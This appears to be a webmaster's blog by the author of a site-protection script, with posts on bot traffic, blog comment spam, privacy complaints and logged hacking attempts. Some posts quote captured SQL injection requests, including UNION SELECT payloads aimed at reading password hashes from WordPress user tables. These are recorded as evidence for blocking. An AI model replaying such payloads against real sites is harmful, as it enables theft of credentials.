What is php/5.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}
Its showing up from lots of IPS but only once. Doesn't look like it comes back after being blocked.
Jul 20, 2016
php/5.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}
Its showing up from lots of IPS but only once. Doesn't look like it comes back after being blocked.
Mar 30, 2012
Dec 16, 2011
webmasters how to disable google related
From :http://www.lunarlog.com/google-related-privacy/
Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.
File a complaint here https://www.ftccomplaintassistant.gov/
Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.
File a complaint here https://www.ftccomplaintassistant.gov/
Google Related Program and My Privacy Issues
I spent the last couple of weeks updating my main website Lunarstudio - mostly reprogramming and adding new images. When updating websites, most responsible webmasters and designers will run their site through additional browsers, operating systems, and test people’s reactions to new content. I had a friend look at my site on Sunday to see if she had any feedback. Out of the corner of my eye, I noticed a full-width bar appear at the bottom of my page on her monitor. My first reaction was “WTF”, followed by concern that somehow I must have uploaded malware to the back-end of my site. The third option which was slightly more worrisome is that some hackers got into my site. So I took a closer look, and the bottom left read “Google Related” (don’t install this.)
Now, I would never think Google would have released a toolbar that covered up part of the screen. Not only was it distracting from the design I had worked so hard it, but it wouldn’t just affect me but almost every webmaster and designer on the planet. So my next thought that it had to be some malware she accidentally downloaded over the course of her Internet travels. Upon even closer inspection, I noticed that it was serving up advertisements and contact information from competitors. So someone looking at my site could see another image at the bottom of the screen, then decide to go to that website instead.
I started to look into this. Sure enough, it’s part of a new, 20-day old Google program which is a toolbar extension for Internet Explorer and Chrome. ArsTechnica wrote a concise article on what Google Relate does here. While it might prove useful for some users, for webmasters and those concerned with privacy, this is an absolute nightmare. It represents a major downfall in Net Neutrality if this is allowed to carry on. *Aside* — some might argue that Google is not a telecom, Internet Provider, or government agency and hence doesn’t fall into the argument of threatening Net Neutrality. However, I should remind people that Google has mentioned that it’s testing their Internet Providing services. Also, Android runs on many cellphones as well as telecom providers. They’re basically in bed with one another.
There’s several different and valid concerns, not to mention the legality of this program:
1.It interferes with a person or company’s intended website design without their permission.
2.It potentially distracts an end-user.
3.It slows down a person’s website loading time. The speed issue is probably negligible, but it’s still there without an owner’s permission.
4.It risks having people leave your website in favor of another. Holding user retention on a landing-page is tough enough, but this just adds fuel to the fire.
5.Due to people wandering off one’s website, it can jeopardize website owner’s businesses and livelihoods.
6.Google is directly (or indirectly) profiteering from someone else’s work without their permission.
7.This is potentially part of their AdWords program, which makes money off of advertisements.
8.It allows for Google to monitor your browsing habits, even when not using Google search. It’s basically spying on your activities.
9.It potentially opens up the door for further abuse.
10.It threatens Google’s competitors (Yahoo!, Bing, and other search engines.) If successful, competitors might also have to roll out similar toolbars or methods.
11.It could become a permanent part of Google Chrome.
Now, there’s some usefulness to the end-user. It wouldn’t be fair for me to mention the Google Related negatives without the positives:
1.Provides directions.
2.Provides alternative solutions for someone looking for a service or help.
I was almost positive Google would provide webmasters with a method to take this off of owner’s websites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unapproved” methods of using CSS code to disable the iframe, either by moving the toolbar off-screen, or by hiding the iframe completely. Unfortunately, I tried these methods and it didn’t work. It seems that Google caught on to webmasters changing their CSS code, and in turn updated their own to prevent us from doing so.
Since then, I’ve brought it to the attention of some friends on Facebook, however I think my concern has largely fallen on deaf ears which is understandable. I’ve also written on the Google Forum where you can see there my concern is #6. Some might call it an overreaction, but I think I’m fully justified here. The people reporting this problem is so low at the moment because Google Related is just starting to get attention. This is part of the reason why I’m writing about it on my blog — it’s to bring attention to this.
My main issue is that Google is intruding upon my work and business without permission. The nail in the coffin is that they are also potentially profiteering without my permission too. I think it’s just a matter of time before Google is:
1.Sued by competitors.
2.Department of Justice goes after them and tries to break up the monopoly.
3.Public outrage from the webmasters community gets out of control.
4.Or they disable it before it gets to any of the points listed above.
I hope I am overly concerned, and that Google disables their new program almost as soon as it has started. However, it blows my mind how this idea got past scores of lawyers, executives, management, and employees at a billion dollar company in the first place. If you agree with my concerns, please promote this article and also express your concern on the Google Related Forum. If you disagree, I’m still interested in hearing your views
Labels:
google related
Mar 11, 2011
"Script Injections" list
Bots vs Browsers - has a new list of all injection atempts.
If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.
If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.
Mar 8, 2011
mas email problems
I have just discovered that the email option of my script can trigger the mas email alarms on the free host. They use this alarnm to stop spammers.
If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.
go into autoban and change all mail commands to
//mail
If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.
go into autoban and change all mail commands to
182.114.206.25 hn.kd.ny.adsl union injection hacker
20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20--
from ip 182.114.206.25 hn.kd.ny.adsl
from ip 182.114.206.25 hn.kd.ny.adsl
Labels:
hacker,
hn.kd.ny.adsl,
union injection
Aug 26, 2010
as13448.com traffic
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)
All Hits From static-208-80-194-34.as13448.com 208.80.194.34
I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com
The website as13448.com is not a ISP so all of those ips need to be blocked.
All Hits From static-208-80-194-34.as13448.com 208.80.194.34
I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com
The website as13448.com is not a ISP so all of those ips need to be blocked.
May 24, 2010
mylife.com privacy violations.
Mylife.com is running TV advertisments and getting a lot of traffic so I checked them out and was shocked to see that when you go to the site and enter your name approx age and zip that the system will come back to you and display your XXX (private info)
Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.
File a complaint here https://www.ftccomplaintassistant.gov/
And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. http://www.privacyrights.org/contact
It is likely that they will not have this information for all states. If they do display private info on you please let us know.
Also see www.complaintsboard.com
Also see http://www.consumeraffairs.com/online/mylife.html
Also see Just say no to Mylife.com
Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.
File a complaint here https://www.ftccomplaintassistant.gov/
And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. http://www.privacyrights.org/contact
It is likely that they will not have this information for all states. If they do display private info on you please let us know.
Also see www.complaintsboard.com
Also see http://www.consumeraffairs.com/online/mylife.html
Also see Just say no to Mylife.com
Better Business Bureau
This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]
Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]
The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]
Feb 7, 2010
New York spam on Road Runner
NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 7:25pm
very nice blog.
very nice blog. manhattanadmin@gmail.comNYC
Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam
1 #
NYC Apartments
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:44pm
interesting.
1 #
NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:28pm
very nice blog.
1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67 Submitted on 2010/02/06 at 10:45am
good blog keep it up.
good blog keep it up. admin@imagehosting21.comFree Image
Hostinghttp://www.imagehosting21.comspam
1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67
Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.
Hello,
Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not
actively monitor nor does Road Runner exercise editorial control over the content of any web site,
electronic mail transmission, mailing list, news group or other material created or accessible over
Road Runner services.
If you feel that a Road Runner subscribers activities constitute harassment and have contact
information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease
and desist" contact with you.
If you receive further contact from the Road Runner subscriber after that point, or do not have
contact information for them: DO NOT REPLY or correspond with that person further. Please instead
forward all documentation to abuse@rr.com, which should include: full email headers or webserver
logs showing posts made on a message board or other Internet forum (these would typically be
obtained from the administration of that site). Logs would need to contain the following
information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone,
Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain
text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of
the message.
Thank you for taking the time to contact Road Runner.
- Road Runner Abuse [SM]
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 7:25pm
very nice blog.
very nice blog. manhattanadmin@gmail.comNYC
Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam
1 #
NYC Apartments
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:44pm
interesting.
1 #
NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:28pm
very nice blog.
1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67 Submitted on 2010/02/06 at 10:45am
good blog keep it up.
good blog keep it up. admin@imagehosting21.comFree Image
Hostinghttp://www.imagehosting21.comspam
1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67
Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.
Hello,
Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not
actively monitor nor does Road Runner exercise editorial control over the content of any web site,
electronic mail transmission, mailing list, news group or other material created or accessible over
Road Runner services.
If you feel that a Road Runner subscribers activities constitute harassment and have contact
information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease
and desist" contact with you.
If you receive further contact from the Road Runner subscriber after that point, or do not have
contact information for them: DO NOT REPLY or correspond with that person further. Please instead
forward all documentation to abuse@rr.com, which should include: full email headers or webserver
logs showing posts made on a message board or other Internet forum (these would typically be
obtained from the administration of that site). Logs would need to contain the following
information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone,
Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain
text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of
the message.
Thank you for taking the time to contact Road Runner.
- Road Runner Abuse [SM]
Jun 30, 2009
wrangler.websitewelcome.com bot
Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com
Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address.
websitewelcome.com added to the block list
74.52.200.178 wrangler.websitewelcome.com
Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address.
websitewelcome.com added to the block list
useragent spamer www.ongarofrancesco.org
Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK">
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it
This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org
This looks to be some hacker ref site. The bot is from Italy
This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it
This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org
This looks to be some hacker ref site. The bot is from Italy
This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML
Jun 24, 2009
IE 8 breaks subdomains making them hard to read using domain highlighting
Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.
This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.
Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.
This has to be fixed.
Microsoft is taking away our legal use of subdomains.
Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.
Zdnet says IE8 puts dim wits ahead of tech savvy.
aidanwalsh.net says
domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8
This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.
Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.
This has to be fixed.
Microsoft is taking away our legal use of subdomains.
Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.
Zdnet says IE8 puts dim wits ahead of tech savvy.
aidanwalsh.net says
why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL.
domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8
Jan 20, 2009
strange code on wp blog detected
mmautoban has detected the following code being used on a WP blog.
Antyone know what this is.
/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20
/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20
%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}
It has about 15 other version I suspect it is some type of atack.
Unless some plugin is malfunctioning.
Anyone have any info what this code is?
Antyone know what this is.
/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20
/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20
/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20
%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}
It has about 15 other version I suspect it is some type of atack.
Unless some plugin is malfunctioning.
Anyone have any info what this code is?
Labels:
wp hack
Jan 15, 2009
OSCommerce mods
OScommerce Notes
===============
A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to
/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order
This generates a +select+ injection hack detection in mmautoban.
To prevent this error edit your OSCommerce english.php file and change the error statement from
Please Select to Please Pick
this will prevent customers from getting banned.
It is unknown if other such errors exist in other places or other programs.
If you see any please report them.
===============
A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to
/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order
This generates a +select+ injection hack detection in mmautoban.
To prevent this error edit your OSCommerce english.php file and change the error statement from
Please Select to Please Pick
this will prevent customers from getting banned.
It is unknown if other such errors exist in other places or other programs.
If you see any please report them.
Labels:
OScommerce bug
Dec 3, 2008
'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker
Just detected this hacker. the ip is block by no-more-funn.moensted.dk
What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)
www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)
www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38
Subscribe to:
Posts (Atom)
